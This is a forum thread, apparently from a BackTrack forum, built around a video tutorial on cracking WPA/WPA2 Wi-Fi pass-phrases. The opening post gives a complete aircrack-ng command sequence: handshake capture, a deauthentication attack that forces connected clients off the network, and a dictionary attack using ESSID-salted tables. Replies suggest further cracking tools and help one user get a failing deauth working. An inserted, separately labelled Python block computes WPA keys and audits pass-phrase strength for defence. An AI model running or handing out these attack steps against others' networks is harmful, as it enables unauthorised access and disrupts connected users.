[Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2318855/
Download video: http://www.mediafire.com/?kn0b37v79rptd9e
What is this?
How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption with a connected client (as both have the same method!). Then a pre-computed hash table, which has been "pre-salted" with the ESSID for the network, is used to get the pass-phrase.
How does this work?
> Captures a 4-way handshake
> Creates a quick DoS (Denial of Service) attack at connected client to force them to disconnect and reconnect
> Apply a brute force dictionary attack to the handshake
What do I need?
> aircrack-ng suite
> WiFi Card that supports monitor mode
> Big dictionary
> Processing power
Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz
Commands:
Code:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0
airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
kate ~/essid
airolib-ng crackwpa --import essid ~/essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack-ng -r crackwpa output*.cap
Notes:
This is cut from my final video called "g0tmi1k's home network".
There HAS to be a CONNECTED client.
The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being cracked are next to nothing!
Song: Sub Focus - Rock It
Video length: 03:53
Capture length: 04:03
Blog Post: http://g0tmi1k.blogspot.com/2009/07/...k-wpawpa2.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1656-%5Bvideo%5D-how-crack-wpa-wpa2-aircrack-ng-airolib-ng.html
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
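Why the table is "pre-salted" with the ESSID, and why a random pass-phrase falls outside any dictionary, shown as an added example that is not part of the original post: the WPA/WPA2-PSK master key is PBKDF2-HMAC-SHA1 over the pass-phrase with the ESSID as salt, so a table is only valid for one ESSID. The helper names, the wordlist and the ESSID set are hypothetical, constructed samples for checking your own network's settings.

```python
import hashlib
import math

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1, ESSID as salt, 4096 rounds, 32 bytes."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("pass-phrase must be 8..63 characters")
    salt = ssid.encode("utf-8")
    if not 1 <= len(salt) <= 32:
        raise ValueError("ESSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), salt, 4096, 32)

def random_passphrase_bits(length: int, alphabet: int = 95) -> float:
    """Entropy of a uniformly random pass-phrase, capped at the 256-bit key size."""
    return min(256.0, length * math.log2(alphabet))

def audit_psk(passphrase: str, ssid: str, wordlist: set, common_ssids: set) -> list:
    """Return findings for one network's settings (hypothetical helper)."""
    findings = []
    if passphrase in wordlist:
        findings.append("pass-phrase appears in a wordlist")
    if ssid in common_ssids:
        findings.append("ESSID is a common default; pre-computed tables may already exist")
    if len(set(passphrase)) < 6 or passphrase.isalpha() or passphrase.isdigit():
        findings.append("pass-phrase uses one character class or few distinct characters")
    return findings

if __name__ == "__main__":
    # Constructed sample data, not taken from the thread.
    WORDLIST = {"password", "letmein123", "qwertyuiop"}
    COMMON_SSIDS = {"linksys", "default", "NETGEAR"}

    # Same pass-phrase, different ESSID: the keys share nothing, so a table
    # built for one ESSID is useless against another.
    print(wpa_pmk("password", "linksys").hex())
    print(wpa_pmk("password", "HomeNet-7f3a").hex())

    print(audit_psk("password", "linksys", WORDLIST, COMMON_SSIDS))
    print(audit_psk("T9#vq!Lx2@pZ8&rK", "HomeNet-7f3a", WORDLIST, COMMON_SSIDS))
    print(random_passphrase_bits(8), random_passphrase_bits(63))
```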
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
thanks for the post .. but same problem .. need big dictionary :( .. but it could be solved if having good luck :)
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
m0j4h3d...try john the ripper and crunch for that...but it can take a long..long...time
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Quote: Originally Posted by m0j4h3d
thanks for the post .. but same problem .. need big dictionary :( .. but it could be solved if having good luck :)
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
What about using genpmk and the essid to pre-compute your hash files, and then cracking with cowpatty? Right now I'm actually torrenting the shmoo top 1000 essids rainbow tables to assist me in cracking, which is probably the best thing about having a laptop that's specifically being used for running bt4. I'm already filling up my 250 GB drive with hashes and dictionaries far beyond those that are in the repos.
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Quote: Originally Posted by gunrunr
What about using genpmk and the essid to pre-compute your hash files, and then cracking with cowpatty? Right now I'm actually torrenting the shmoo top 1000 essids rainbow tables to assist me in cracking, which is probably the best thing about having a laptop that's specifically being used for running bt4. I'm already filling up my 250 GB drive with hashes and dictionaries far beyond those that are in the repos.
Hello,
I did a video on my blog of Aircrack-ng vs coWPAtty, comparing the speeds & time it takes to crack, and I've now posted it here for you:
http://www.backtrack-linux.org/forum....html#post8094
and yes, I've also got a torrent on the go, seeding a few hashes & dictionaries myself!
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Thanks,
Nice share, I haven't seen such gr8 explanation elsewhere
But I am facing some problems !!! Can u PLease HELP ME ??:confused:
I hav successfully executed commands :
Quote:
airmon-ng start wlan0
airodump-ng mon0
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0
But the command "aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0"
NOT working properly as shown in fig ..
http://img210.imageshack.us/img210/4444/77296826.jpg
Can u tell me What is problem der ?
Also Please help me 2 solve this problem !!!!!
Thank U !!! Waiting !!!
MOD EDIT: Removed Huge Picture. Left Link in place.
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Quote: Originally Posted by patilmanali1989
Thanks,
Nice share, I haven't seen such gr8 explanation elsewhere
But I am facing some problems !!! Can u PLease HELP ME ??:confused:
I hav successfully executed commands :
But the command "aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0"
NOT working properly as shown in fig ..
* HUGE PICTURE*
Can u tell me What is problem der ?
Also Please help me 2 solve this problem !!!!!
Thank U !!! Waiting !!!
Well... the AP is on a different channel to you! (You're on 1, it's on 6!)
What OS is the client running? It didn't work 100% for me when the client was Windows 7...
I've also found that some attacks work better with different routers... Swap the router if you have another one?
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Hello g0tmi1k!
I've got a problem too. :(
If I upload a video to YouTube, will you tell me what I am doing wrong?
Thanks!
Re: [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
Quote: Originally Posted by cimbi
Hello g0tmi1k!
I've got a problem too. :(
If I upload a video to YouTube, will you tell me what I am doing wrong?
Thanks!
Your problem is asking for permission to upload to youtube?
Sure...I guess? Just make sure to give credit/link back.